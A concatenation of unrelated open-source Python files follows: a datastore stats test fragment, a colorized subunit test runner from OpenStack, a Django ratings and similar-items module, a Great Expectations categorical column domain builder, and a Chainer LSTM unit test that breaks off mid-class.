    self.assertEqual('pn1', res[0].property_name)
    self.assertEqual('pt1', res[0].property_type)
    self.assertEqual('foo12', res[1].kind_name)
    self.assertEqual('pn2', res[1].property_name)
    self.assertEqual('pt2', res[1].property_type)
    self.assertEqual('foo22', res[2].kind_name)
    self.assertEqual('pn2', res[2].property_name)
    self.assertEqual('pt2', res[2].property_type)
    self.assertEqual(2, res[0].entity_bytes)
    self.assertEqual(3, res[0].builtin_index_count)
    self.assertEqual(1, res[0].builtin_index_bytes)
    # Filtering by kind narrows to the matching stat row only.
    query = stats.KindPropertyNamePropertyTypeStat.query(
        stats.KindPropertyNamePropertyTypeStat.kind_name == 'foo22')
    res = query.fetch()
    self.assertEqual(1, len(res))
    self.assertEqual('foo22', res[0].kind_name)
def testKindCompositeIndex(self):
    """Test fetching the (kind, composite index id) stats."""
    res = stats.KindCompositeIndexStat.query().fetch()
    self.assertEqual(3, len(res))
    self.assertEqual('foo12', res[0].kind_name)
    self.assertEqual(1, res[0].index_id)
    self.assertEqual('foo12', res[1].kind_name)
    self.assertEqual(2, res[1].index_id)
    self.assertEqual('foo22', res[2].kind_name)
    self.assertEqual(3, res[2].index_id)
    self.assertEqual(4, res[0].bytes)
    self.assertEqual(2, res[0].count)
# Allow running this test module directly from the command line.
if __name__ == '__main__':
    unittest.main()
| |
#!/usr/bin/env python
# Based on: https://github.com/openstack/tempest/blob/master/tools/colorizer.py
# ------------------------------------------------------------------------
# Copyright (c) 2013, Nebula, Inc.
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# Colorizer Code is borrowed from Twisted:
# Copyright (c) 2001-2010 Twisted Matrix Laboratories.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""Display a subunit stream through a colorized unittest test runner.
Modified a bit from the original version to fit pep8 and hacking rules.
"""
import heapq
import sys
import unittest
import subunit
import testtools
class _AnsiColorizer(object):
    """Presents colorizer object.

    A colorizer is an object that loosely wraps around a stream, allowing
    callers to write text to the stream in a particular color.

    Colorizer classes must implement C{supported()} and C{write(text, color)}.
    """

    # ANSI SGR foreground color codes.
    _colors = dict(black=30, red=31, green=32, yellow=33,
                   blue=34, magenta=35, cyan=36, white=37)

    def __init__(self, stream):
        self.stream = stream

    @classmethod  # modern decorator form of `supported = classmethod(supported)`
    def supported(cls, stream=sys.stdout):
        """Returns if current platform supports coloring terminal output."""
        if not stream.isatty():
            return False  # auto color only on TTYs
        try:
            import curses
        except ImportError:
            return False
        else:
            try:
                try:
                    return curses.tigetnum("colors") > 2
                except curses.error:
                    # terminfo not initialized yet; set it up and retry.
                    curses.setupterm()
                    return curses.tigetnum("colors") > 2
            except Exception:
                # guess false in case of error
                return False

    def write(self, text, color):
        """Write the given text to the stream in the given color.

        :param text: Text to be written to the stream.
        :param color: A string label for a color. e.g. 'red', 'white'.
        """
        color = self._colors[color]
        self.stream.write('\x1b[%s;1m%s\x1b[0m' % (color, text))
class _Win32Colorizer(object):
    """See _AnsiColorizer docstring."""

    def __init__(self, stream):
        import win32console
        red, green, blue, bold = (win32console.FOREGROUND_RED,
                                  win32console.FOREGROUND_GREEN,
                                  win32console.FOREGROUND_BLUE,
                                  win32console.FOREGROUND_INTENSITY)
        self.stream = stream
        self.screenBuffer = win32console.GetStdHandle(
            win32console.STD_OUT_HANDLE)
        # Console attributes are bitmasks built from the R/G/B/bold flags.
        self._colors = {'normal': red | green | blue,
                        'red': red | bold,
                        'green': green | bold,
                        'blue': blue | bold,
                        'yellow': red | green | bold,
                        'magenta': red | blue | bold,
                        'cyan': green | blue | bold,
                        'white': red | green | blue | bold}

    @classmethod  # modern decorator form of `supported = classmethod(supported)`
    def supported(cls, stream=sys.stdout):
        """Return True when the win32 console accepts color attributes."""
        try:
            import win32console
            screenBuffer = win32console.GetStdHandle(
                win32console.STD_OUT_HANDLE)
        except ImportError:
            return False
        import pywintypes
        try:
            # Probe by actually setting an attribute; restore is implicit
            # since 'normal' is written on every subsequent write().
            screenBuffer.SetConsoleTextAttribute(
                win32console.FOREGROUND_RED |
                win32console.FOREGROUND_GREEN |
                win32console.FOREGROUND_BLUE)
        except pywintypes.error:
            return False
        else:
            return True

    def write(self, text, color):
        color = self._colors[color]
        self.screenBuffer.SetConsoleTextAttribute(color)
        self.stream.write(text)
        self.screenBuffer.SetConsoleTextAttribute(self._colors['normal'])
class _NullColorizer(object):
    """See _AnsiColorizer docstring."""

    def __init__(self, stream):
        self.stream = stream

    @classmethod  # modern decorator form of `supported = classmethod(supported)`
    def supported(cls, stream=sys.stdout):
        # The null colorizer works everywhere: it simply drops the color.
        return True

    def write(self, text, color):
        self.stream.write(text)
def get_elapsed_time_color(elapsed_time):
    """Return the color name used to render an elapsed-time value.

    The threshold-based scheme (red above 60s, yellow above 10s) is kept
    below but disabled; every duration currently renders green.
    """
    # if elapsed_time > 60.0:
    #     return 'red'
    # elif elapsed_time > 10.0:
    #     return 'yellow'
    # else:
    return 'green'
def get_shouldfail_info(details):
    """Return the stripped 'shouldfail-info' text from a details mapping.

    Returns the empty string when details is falsy or the key is absent.
    """
    if not details:
        return ''
    content = details.get('shouldfail-info')
    if not content:
        return ''
    return content.as_text().strip()
def split_test_id(test_id):
    """Split a dotted test id into (test_class, test_name).

    An id without a dot yields an empty class and the id as the name.
    """
    test_class, sep, test_name = test_id.rpartition('.')
    if not sep:
        return '', test_id
    return test_class, test_name
class NovaTestResult(testtools.TestResult):
    """Streaming test result that groups output per test class with color.

    Results are buffered per class and flushed either when a class has
    been quiet for a while or at the end of the run; the slowest tests
    are tracked in a fixed-size heap and reported last.
    """

    def __init__(self, stream, descriptions, verbosity):
        super(NovaTestResult, self).__init__()
        self.stream = stream
        self.showAll = verbosity > 1
        self.num_slow_tests = 10
        self.slow_tests = []  # this is a fixed-sized heap
        self.colorizer = None
        # NOTE(vish): reset stdout for the terminal check
        stdout = sys.stdout
        sys.stdout = sys.__stdout__
        for colorizer in [_Win32Colorizer, _AnsiColorizer, _NullColorizer]:
            if colorizer.supported():
                self.colorizer = colorizer(self.stream)
                break
        sys.stdout = stdout
        self.start_time = None
        self.last_time = {}
        self.results = {}
        self.last_written = None
        self.own_expected_failures = []
        self.own_unexpected_successes = []

    def _writeElapsedTime(self, elapsed):
        color = get_elapsed_time_color(elapsed)
        self.colorizer.write(" %.2f" % elapsed, color)

    def _addResult(self, test, *args):
        """Record one finished test and flush any class due for output."""
        try:
            name = test.id()
        except AttributeError:
            name = 'Unknown.unknown'
        test_class, test_name = split_test_id(name)
        elapsed = (self._now() - self.start_time).total_seconds()
        item = (elapsed, test_class, test_name)
        # Keep only the num_slow_tests slowest entries.
        if len(self.slow_tests) >= self.num_slow_tests:
            heapq.heappushpop(self.slow_tests, item)
        else:
            heapq.heappush(self.slow_tests, item)
        self.results.setdefault(test_class, [])
        self.results[test_class].append((test_name, elapsed) + args)
        self.last_time[test_class] = self._now()
        self.writeTests()

    def _writeResult(self, test_name, elapsed, long_result, color,
                     short_result, success):
        if self.showAll:
            self.stream.write(' %s' % str(test_name).ljust(68))
            self.colorizer.write(long_result, color)
            if success:
                self._writeElapsedTime(elapsed)
            self.stream.writeln()
        else:
            self.colorizer.write(short_result, color)

    def addSuccess(self, test):
        super(NovaTestResult, self).addSuccess(test)
        self._addResult(test, 'OK', 'green', '.', True)

    def addUnexpectedSuccess(self, test, details=None):
        super(NovaTestResult, self).addUnexpectedSuccess(test, details)
        self._addResult(test, 'UX-OK', 'red', 'X', True)
        self.own_unexpected_successes.append(
            (test, get_shouldfail_info(details)))

    def addFailure(self, test, err):
        # subunit emits a synthetic 'process-returncode' failure; skip it.
        if test.id() == 'process-returncode':
            return
        super(NovaTestResult, self).addFailure(test, err)
        self._addResult(test, 'FAIL', 'red', 'F', False)

    def addExpectedFailure(self, test, err=None, details=None):
        super(NovaTestResult, self).addExpectedFailure(test, err, details)
        self._addResult(test, 'X-FAIL', 'green', '*', True)
        self.own_expected_failures.append(
            (test, get_shouldfail_info(details)))

    def addError(self, test, err):
        # BUGFIX: record via addError (the original called addFailure),
        # so errors land in self.errors and printErrors() can actually
        # show them under "ERRORS" instead of mislabeling as failures.
        super(NovaTestResult, self).addError(test, err)
        self._addResult(test, 'ERROR', 'red', 'E', False)

    def addSkip(self, test, reason=None, details=None):
        super(NovaTestResult, self).addSkip(test, reason, details)
        self._addResult(test, 'SKIP', 'cyan', 'S', False)

    def startTest(self, test):
        self.start_time = self._now()
        super(NovaTestResult, self).startTest(test)

    def writeTestCase(self, cls):
        """Flush the buffered results for one class, then forget them."""
        if not self.results.get(cls):
            return
        if cls != self.last_written:
            self.colorizer.write(cls, 'blue')
            self.stream.writeln()
        for result in self.results[cls]:
            self._writeResult(*result)
        del self.results[cls]
        self.stream.flush()
        self.last_written = cls

    def writeTests(self):
        """Flush classes that have gone quiet for more than two seconds."""
        time = self.last_time.get(self.last_written, self._now())
        if not self.last_written or (self._now() - time).total_seconds() > 2.0:
            diff = 3.0
            while diff > 2.0:
                if not self.results:
                    # Everything flushed; min() below would raise on empty.
                    break
                classes = self.results.keys()
                oldest = min(classes, key=lambda x: self.last_time[x])
                diff = (self._now() - self.last_time[oldest]).total_seconds()
                self.writeTestCase(oldest)
        else:
            self.writeTestCase(self.last_written)

    def done(self):
        self.stopTestRun()

    def stopTestRun(self):
        # list() the keys: writeTestCase deletes entries while we iterate,
        # and dict.iterkeys() does not exist on Python 3 anyway.
        for cls in list(self.results.keys()):
            self.writeTestCase(cls)
        self.stream.writeln()
        self.writeSlowTests()

    def writeSlowTests(self):
        # Pare out 'fast' tests
        slow_tests = [item for item in self.slow_tests
                      if get_elapsed_time_color(item[0]) != 'green']
        if slow_tests:
            slow_total_time = sum(item[0] for item in slow_tests)
            slow = ("Slowest %i tests took %.2f secs:"
                    % (len(slow_tests), slow_total_time))
            self.colorizer.write(slow, 'yellow')
            self.stream.writeln()
            last_cls = None
            # sort by name
            for elapsed, cls, name in sorted(slow_tests,
                                             key=lambda x: x[1] + x[2]):
                if cls != last_cls:
                    self.colorizer.write(cls, 'blue')
                    self.stream.writeln()
                last_cls = cls
                self.stream.write(' %s' % str(name).ljust(68))
                self._writeElapsedTime(elapsed)
                self.stream.writeln()

    def printErrors(self):
        if self.showAll:
            self.stream.writeln()
        self.printErrorList('EXPECTED FAILURES',
                            self.own_expected_failures, 'green')
        self.printErrorList('UNEXPECTED SUCCESSES',
                            self.own_unexpected_successes, 'magenta')
        self.printErrorList('ERRORS', self.errors, 'red')
        self.printErrorList('FAILURES', self.failures, 'red')

    def printErrorList(self, flavor, errors, color):
        if not errors:
            return
        self.colorizer.write("=" * 80, color)
        self.stream.writeln()
        self.colorizer.write(flavor + ":", color)
        self.stream.writeln()
        self.colorizer.write("-" * 80, color)
        self.stream.writeln()
        for test, err in errors:
            self.colorizer.write(test.id(), color)
            self.stream.writeln()
            if err:
                self.stream.writeln("%s" % err)
            self.stream.writeln()
# Read the subunit stream from stdin and replay it through the runner.
test = subunit.ProtocolTestCase(sys.stdin, passthrough=None)
if sys.version_info[0:2] <= (2, 6):
    # unittest on Python <= 2.6 has no resultclass parameter.
    runner = unittest.TextTestRunner(verbosity=2)
else:
    runner = unittest.TextTestRunner(verbosity=2, resultclass=NovaTestResult)
sys.exit(0 if runner.run(test).wasSuccessful() else 1)
| |
import hashlib
from django.contrib.auth.models import User
from django.contrib.contenttypes.fields import GenericForeignKey
from django.contrib.contenttypes.models import ContentType
from django.db import models
from django.db.models.query import QuerySet
from generic_aggregation import generic_annotate
from .utils import is_gfk, recommended_items
class RatedItemBase(models.Model):
    """Abstract base for a single user's rating of some object.

    Concrete subclasses supply the relation to the rated object (a plain
    FK or a generic FK named ``content_object``) and override
    ``lookup_kwargs``/``base_kwargs`` to filter on it.
    """

    # Numeric rating value; indexed so aggregate ordering stays cheap.
    score = models.FloatField(default=0, db_index=True)
    user = models.ForeignKey(User, related_name='%(class)ss', on_delete=models.CASCADE)
    # SHA-1 of "<app_label>.<model>.<pk>" of the rated object, refreshed
    # on every save() and indexed for fast exact lookups.
    hashed = models.CharField(max_length=40, editable=False, db_index=True)

    class Meta:
        abstract = True

    def __str__(self):
        # Relies on the subclass providing a `content_object` attribute.
        return "%s rated %s by %s" % (self.content_object, self.score, self.user)

    def save(self, *args, **kwargs):
        # Keep the hash in sync with the current rated object on every save.
        self.hashed = self.generate_hash()
        super(RatedItemBase, self).save(*args, **kwargs)

    def generate_hash(self):
        """Return a stable SHA-1 hex digest identifying the rated object."""
        content_field = self._meta.get_field('content_object')
        related_object = getattr(self, content_field.name)
        uniq = '%s.%s' % (related_object._meta, related_object.pk)
        # NOTE(review): 'ascii' raises for non-ASCII primary keys;
        # presumably pks here are integers -- confirm before relaxing.
        return hashlib.sha1(uniq.encode('ascii')).hexdigest()

    @classmethod
    def lookup_kwargs(cls, instance):
        # Filter kwargs selecting ratings attached to *instance*.
        return {'content_object': instance}

    @classmethod
    def base_kwargs(cls, model_class):
        # Extra filter kwargs scoped to the rated model class (none here).
        return {}
class RatedItem(RatedItemBase):
    """Concrete rating model targeting any model via a generic foreign key."""

    object_id = models.IntegerField()
    content_type = models.ForeignKey(
        ContentType,
        related_name='rated_items',
        on_delete=models.CASCADE,
    )
    content_object = GenericForeignKey()

    @classmethod
    def lookup_kwargs(cls, instance):
        # Filter on (object_id, content_type) because a GenericForeignKey
        # itself cannot be used directly in queryset filters.
        return {
            'object_id': instance.pk,
            'content_type': ContentType.objects.get_for_model(instance)
        }

    @classmethod
    def base_kwargs(cls, model_class):
        # Scope queries to ratings whose target is of model_class's type.
        return {'content_type': ContentType.objects.get_for_model(model_class)}
# this goes on your model
class Ratings(object):
    """Declarative hook that installs rating support on a model class.

    Assign ``ratings = Ratings()`` on a model; Django's metaclass calls
    contribute_to_class, which wires up the ratings descriptor.
    """

    def __init__(self, rating_model=None):
        if rating_model is None:
            rating_model = RatedItem
        self.rating_model = rating_model

    def contribute_to_class(self, cls, name):
        # Install the descriptor under the attribute name used on the
        # model, and remember that name on the model class itself.
        descriptor = _RatingsDescriptor(cls, self.rating_model, name)
        setattr(cls, name, descriptor)
        setattr(cls, '_ratings_field', name)
class RatingsQuerySet(QuerySet):
    """QuerySet over rating rows that remembers which model was rated."""

    def __init__(self, model=None, query=None, using=None, hints=None, rated_model=None):
        # rated_model: the model class whose instances received the ratings;
        # needed by order_by_rating to build the annotated queryset.
        self.rated_model = rated_model
        super(RatingsQuerySet, self).__init__(model, query, using, hints)

    def _clone(self, *args, **kwargs):
        # Django clones querysets on every chained call; carry the extra
        # attribute along or it would be lost after the first filter().
        instance = super(RatingsQuerySet, self)._clone(*args, **kwargs)
        instance.rated_model = self.rated_model
        return instance

    def order_by_rating(self, aggregator=models.Sum, descending=True,
                        queryset=None, alias='score'):
        """Return rated-model objects ordered by aggregated rating score.

        aggregator: aggregate class applied to the related scores.
        descending: order high-to-low when True.
        queryset: base queryset of rated objects (defaults to all).
        alias: name of the annotation added to each returned object.
        """
        related_field = self.model._meta.get_field('content_object')
        if queryset is None:
            queryset = self.rated_model._default_manager.all()
        ordering = descending and '-%s' % alias or alias
        if not is_gfk(related_field):
            # Plain FK: annotate through the reverse relation directly.
            query_name = related_field.related_query_name()
            if len(self.query.where.children):
                # This queryset is filtered; restrict the rated objects to
                # those actually referenced by the filtered ratings.
                queryset = queryset.filter(**{
                    '%s__pk__in' % query_name: self.values_list('pk')
                })
            return queryset.annotate(**{
                alias: aggregator('%s__score' % query_name)
            }).order_by(ordering)
        else:
            # Generic FK: delegate the annotation to generic_aggregation.
            return generic_annotate(
                queryset,
                self,
                aggregator('score'),
                related_field,
                alias=alias
            ).order_by(ordering)
class _RatingsDescriptor(models.Manager):
    """Descriptor installed on the rated model by Ratings.contribute_to_class.

    Accessed on the class it behaves as a manager over every rating for
    that model; accessed on an instance it builds a related manager
    scoped to that single instance's ratings.
    """

    def __init__(self, rated_model, rating_model, rating_field):
        self.rated_model = rated_model
        self.rating_model = rating_model
        self.rating_field = rating_field

    def __get__(self, instance, instance_type=None):
        if instance is None:
            # Class-level access: act as a plain manager.
            return self
        return self.create_manager(instance, self.rating_model._default_manager.__class__)

    def __set__(self, instance, value):
        # Assignment attaches the given rating objects to the instance.
        if instance is None:
            raise AttributeError("Manager must be accessed via instance")
        manager = self.__get__(instance)
        manager.add(*value)

    def get_queryset(self):
        # All ratings for the rated model, pre-filtered by base_kwargs
        # (e.g. the content type for generic-FK rating models).
        base_filters = self.rating_model.base_kwargs(self.rated_model)
        qs = RatingsQuerySet(self.rating_model, rated_model=self.rated_model)
        return qs.filter(**base_filters)

    def delete_manager(self, instance):
        """
        Returns a queryset based on the related model's base manager (rather
        than the default manager, as returned by __get__). Used by
        Model.delete().
        """
        return self.create_manager(instance,
                                   self.rating_model._base_manager.__class__)

    def create_manager(self, instance, superclass):
        """
        Dynamically create a RelatedManager to handle the back side of the (G)FK
        """
        rel_model = self.rating_model
        rated_model = self.rated_model

        class RelatedManager(superclass):
            # NOTE: methods close over `instance` and `rel_model` from the
            # enclosing create_manager call.
            def get_queryset(self):
                qs = RatingsQuerySet(rel_model, rated_model=rated_model)
                return qs.filter(**(self.core_filters))

            def add(self, *objs):
                # Point each rating object at `instance` and persist it.
                lookup_kwargs = rel_model.lookup_kwargs(instance)
                for obj in objs:
                    if not isinstance(obj, self.model):
                        raise TypeError("'%s' instance expected" % self.model._meta.object_name)
                    for (k, v) in lookup_kwargs.items():
                        setattr(obj, k, v)
                    obj.save()
            add.alters_data = True

            def create(self, **kwargs):
                kwargs.update(rel_model.lookup_kwargs(instance))
                return super(RelatedManager, self).create(**kwargs)
            create.alters_data = True

            def get_or_create(self, **kwargs):
                kwargs.update(rel_model.lookup_kwargs(instance))
                return super(RelatedManager, self).get_or_create(**kwargs)
            get_or_create.alters_data = True

            def remove(self, *objs):
                for obj in objs:
                    # Is obj actually part of this descriptor set?
                    if obj in self.all():
                        obj.delete()
                    else:
                        raise rel_model.DoesNotExist(
                            "%r is not related to %r." % (obj, instance))
            remove.alters_data = True

            def clear(self):
                self.all().delete()
            clear.alters_data = True

            def rate(self, user, score):
                # One rating per user: create it or update the score in place.
                rating, created = self.get_or_create(user=user)
                if created or score != rating.score:
                    rating.score = score
                    rating.save()
                return rating

            def unrate(self, user):
                # Delete this user's rating(s) of `instance`.
                return self.filter(user=user, **rel_model.lookup_kwargs(instance)).delete()

            def perform_aggregation(self, aggregator):
                score = self.all().aggregate(agg=aggregator('score'))
                return score['agg']

            def cumulative_score(self):
                # simply the sum of all scores, useful for +1/-1
                return self.perform_aggregation(models.Sum)

            def average_score(self):
                # the average of all the scores, useful for 1-5
                return self.perform_aggregation(models.Avg)

            def standard_deviation(self):
                # the standard deviation of all the scores, useful for 1-5
                return self.perform_aggregation(models.StdDev)

            def variance(self):
                # the variance of all the scores, useful for 1-5
                return self.perform_aggregation(models.Variance)

            def similar_items(self):
                return SimilarItem.objects.get_for_item(instance)

        manager = RelatedManager()
        manager.core_filters = rel_model.lookup_kwargs(instance)
        manager.model = rel_model

        return manager

    def update_similar_items(self):
        # Recompute the SimilarItem table from all ratings of this model.
        from ratings.utils import calculate_similar_items
        calculate_similar_items(self.all())

    def similar_items(self, item):
        return SimilarItem.objects.get_for_item(item)

    def recommended_items(self, user):
        # Items this user has not rated, predicted from similar raters.
        return recommended_items(self.all(), user)

    def order_by_rating(self, aggregator=models.Sum, descending=True,
                        queryset=None, alias='score'):
        return self.all().order_by_rating(
            aggregator, descending, queryset, alias
        )
class SimilarItemManager(models.Manager):
    """Manager exposing similarity lookups for a concrete object."""

    def get_for_item(self, instance):
        """Return SimilarItem rows for *instance*, best matches first."""
        ctype = ContentType.objects.get_for_model(instance)
        matches = self.filter(content_type=ctype, object_id=instance.pk)
        return matches.order_by('-score')
class SimilarItem(models.Model):
    """Directed similarity edge between two arbitrary objects.

    Both endpoints are generic foreign keys; `score` is the computed
    similarity used for ordering recommendations.
    """

    # Source object of the similarity relation.
    content_type = models.ForeignKey(
        ContentType,
        related_name='similar_items',
        on_delete=models.CASCADE,
    )
    object_id = models.IntegerField()
    content_object = GenericForeignKey('content_type', 'object_id')

    # Target object judged similar to the source.
    similar_content_type = models.ForeignKey(
        ContentType,
        related_name='similar_items_set',
        on_delete=models.CASCADE,
    )
    similar_object_id = models.IntegerField()
    similar_object = GenericForeignKey('similar_content_type', 'similar_object_id')

    # Similarity strength; higher means more similar.
    score = models.FloatField(default=0)

    objects = SimilarItemManager()

    def __str__(self):
        return '%s (%s)' % (self.similar_object, self.score)
| |
from typing import Any, Dict, List, Optional, Set, Tuple, Union
from great_expectations.core.batch import Batch, BatchRequest, RuntimeBatchRequest
from great_expectations.execution_engine.execution_engine import MetricDomainTypes
from great_expectations.rule_based_profiler.domain_builder import ColumnDomainBuilder
from great_expectations.rule_based_profiler.helpers.cardinality_checker import (
AbsoluteCardinalityLimit,
CardinalityChecker,
CardinalityLimitMode,
RelativeCardinalityLimit,
)
from great_expectations.rule_based_profiler.helpers.util import (
build_simple_domains_from_column_names,
get_resolved_metrics_by_key,
)
from great_expectations.rule_based_profiler.types import Domain, ParameterContainer
from great_expectations.validator.metric_configuration import MetricConfiguration
class CategoricalColumnDomainBuilder(ColumnDomainBuilder):
    """
    This DomainBuilder uses column cardinality to identify domains.
    """

    # cardinality_checker is rebuilt from its config arguments, so keep
    # it out of the serialized field set inherited from the base class.
    exclude_field_names: Set[str] = ColumnDomainBuilder.exclude_field_names | {
        "cardinality_checker",
    }

    def __init__(
        self,
        batch_list: Optional[List[Batch]] = None,
        batch_request: Optional[Union[BatchRequest, RuntimeBatchRequest, dict]] = None,
        data_context: Optional["DataContext"] = None,  # noqa: F821
        limit_mode: Optional[Union[CardinalityLimitMode, str]] = None,
        max_unique_values: Optional[int] = None,
        # a proportion is fractional, so float (was annotated int)
        max_proportion_unique: Optional[float] = None,
        exclude_columns: Optional[Union[str, Optional[List[str]]]] = None,
    ):
        """Create column domains where cardinality is within the specified limit.

        Cardinality refers to the number of unique values in a given domain.
        Categorical generally refers to columns with relatively limited
        number of unique values.
        Limit mode can be absolute (number of unique values) or relative
        (proportion of unique values). You can choose one of: limit_mode,
        max_unique_values or max_proportion_unique to specify the cardinality
        limit.
        Note that the limit must be met for each batch separately that is
        supplied in the batch_request or the column domain will not be included.
        Note that the columns used will be from the first batch retrieved
        via the batch_request. If other batches contain additional columns,
        these will not be considered.

        Args:
            batch_list: explicitly specified Batch objects for use in DomainBuilder
            batch_request: BatchRequest to be optionally used to define batches to consider for this domain builder.
            data_context: DataContext associated with this profiler.
            limit_mode: CardinalityLimitMode or string name of the mode
                defining the maximum allowable cardinality to use when
                filtering columns.
            max_unique_values: number of max unique rows for a custom
                cardinality limit to use when filtering columns.
            max_proportion_unique: proportion of unique values for a
                custom cardinality limit to use when filtering columns.
            exclude_columns: If provided, these columns are pre-filtered and
                excluded from consideration, cardinality is not computed.
        """
        super().__init__(
            batch_list=batch_list,
            batch_request=batch_request,
            data_context=data_context,
            column_names=None,
        )
        # CardinalityChecker validates that exactly one limit style was given.
        self._cardinality_checker = CardinalityChecker(
            limit_mode=limit_mode,
            max_unique_values=max_unique_values,
            max_proportion_unique=max_proportion_unique,
        )

        self._exclude_columns = exclude_columns

    @property
    def domain_type(self) -> Union[str, MetricDomainTypes]:
        return MetricDomainTypes.COLUMN

    @property
    def cardinality_checker(self) -> CardinalityChecker:
        return self._cardinality_checker

    @property
    def exclude_columns(self) -> Optional[List[str]]:
        # May be None when no exclusions were configured.
        return self._exclude_columns

    def _get_domains(
        self,
        variables: Optional[ParameterContainer] = None,
    ) -> List[Domain]:
        """Return domains matching the selected limit_mode.

        Args:
            variables: Optional variables to substitute when evaluating.

        Returns:
            List of domains that match the desired cardinality.
        """
        # 1) Candidate columns, minus the configured exclusions.
        table_column_names: List[str] = self.get_effective_column_names(
            include_columns=None,
            exclude_columns=self.exclude_columns,
            variables=variables,
        )

        batch_ids: List[str] = self.get_batch_ids(variables=variables)

        # 2) One cardinality metric per (column, batch) pair.
        metrics_for_cardinality_check: Dict[
            str, List[MetricConfiguration]
        ] = self._generate_metric_configurations_to_check_cardinality(
            batch_ids=batch_ids, column_names=table_column_names
        )

        validator: "Validator" = self.get_validator(variables=variables)  # noqa: F821

        # 3) Keep only columns whose cardinality fits the limit in every batch.
        candidate_column_names: List[
            str
        ] = self._column_names_meeting_cardinality_limit(
            validator=validator,
            metrics_for_cardinality_check=metrics_for_cardinality_check,
        )

        return build_simple_domains_from_column_names(
            column_names=candidate_column_names,
            domain_type=self.domain_type,
        )

    def _generate_metric_configurations_to_check_cardinality(
        self,
        batch_ids: List[str],
        column_names: List[str],
    ) -> Dict[str, List[MetricConfiguration]]:
        """Generate metric configurations used to compute metrics for checking cardinality.

        Args:
            batch_ids: List of batch_ids used to create metric configurations.
            column_names: List of column_names used to create metric configurations.

        Returns:
            Dictionary of the form {
                "my_column_name": List[MetricConfiguration],
            }
        """
        # The metric name depends on the limit style (absolute vs relative).
        limit_mode: Union[
            AbsoluteCardinalityLimit, RelativeCardinalityLimit
        ] = self.cardinality_checker.limit_mode

        column_name: str
        batch_id: str
        metric_configurations: Dict[str, List[MetricConfiguration]] = {
            column_name: [
                MetricConfiguration(
                    metric_name=limit_mode.metric_name_defining_limit,
                    metric_domain_kwargs={
                        "column": column_name,
                        "batch_id": batch_id,
                    },
                    metric_value_kwargs=None,
                    metric_dependencies=None,
                )
                for batch_id in batch_ids
            ]
            for column_name in column_names
        }

        return metric_configurations

    def _column_names_meeting_cardinality_limit(
        self,
        validator: "Validator",  # noqa: F821
        metrics_for_cardinality_check: Dict[str, List[MetricConfiguration]],
    ) -> List[str]:
        """Compute cardinality and return column names meeting cardinality limit.

        Args:
            validator: Validator used to compute column cardinality.
            metrics_for_cardinality_check: metric configurations used to compute cardinality.

        Returns:
            List of column names meeting cardinality.
        """
        column_name: str
        resolved_metrics: Dict[Tuple[str, str, str], Any]
        metric_value: Any

        resolved_metrics_by_column_name: Dict[
            str, Dict[Tuple[str, str, str], Any]
        ] = get_resolved_metrics_by_key(
            validator=validator,
            metric_configurations_by_key=metrics_for_cardinality_check,
        )

        # A column qualifies only if EVERY batch's metric is within limit.
        candidate_column_names: List[str] = [
            column_name
            for column_name, resolved_metrics in resolved_metrics_by_column_name.items()
            if all(
                [
                    self.cardinality_checker.cardinality_within_limit(
                        metric_value=metric_value
                    )
                    for metric_value in list(resolved_metrics.values())
                ]
            )
        ]

        return candidate_column_names
| |
import unittest
import numpy
import chainer
from chainer import cuda
from chainer import functions
from chainer import links
from chainer import testing
from chainer.testing import attr
@testing.parameterize(
    {'in_size': 10, 'out_size': 10},
    {'in_size': 10, 'out_size': 40},
)
class TestLSTM(unittest.TestCase):
    """Checks links.LSTM forward outputs against functions.lstm."""

    def setUp(self):
        self.link = links.LSTM(self.in_size, self.out_size)
        # Randomize both weight matrices so the check is non-trivial.
        upward = self.link.upward.W.data
        upward[...] = numpy.random.uniform(-1, 1, upward.shape)
        lateral = self.link.lateral.W.data
        lateral[...] = numpy.random.uniform(-1, 1, lateral.shape)
        self.link.zerograds()

        self.upward = upward.copy()  # fixed on CPU
        self.lateral = lateral.copy()  # fixed on CPU

        x_shape = (4, self.in_size)
        self.x = numpy.random.uniform(-1, 1, x_shape).astype(numpy.float32)

    def check_forward(self, x_data):
        xp = self.link.xp
        x = chainer.Variable(x_data)
        # First step: the link has no state yet, so its output must equal
        # one LSTM step from a zero cell driven by the upward path alone.
        h1 = self.link(x)
        c0 = chainer.Variable(xp.zeros((len(self.x), self.out_size),
                                       dtype=self.x.dtype))
        c1_expect, h1_expect = functions.lstm(c0, self.link.upward(x))
        testing.assert_allclose(h1.data, h1_expect.data)
        testing.assert_allclose(self.link.h.data, h1_expect.data)
        testing.assert_allclose(self.link.c.data, c1_expect.data)

        # Second step: stored (c, h) must feed back via the lateral path.
        h2 = self.link(x)
        c2_expect, h2_expect = \
            functions.lstm(c1_expect,
                           self.link.upward(x) + self.link.lateral(h1))
        testing.assert_allclose(h2.data, h2_expect.data)

    def test_forward_cpu(self):
        self.check_forward(self.x)

    @attr.gpu
    def test_forward_gpu(self):
        self.link.to_gpu()
        self.check_forward(cuda.to_gpu(self.x))
class TestLSTMState(unittest.TestCase):
    """Checks creation, assignment and reset of links.LSTM state (c, h)."""

    def setUp(self):
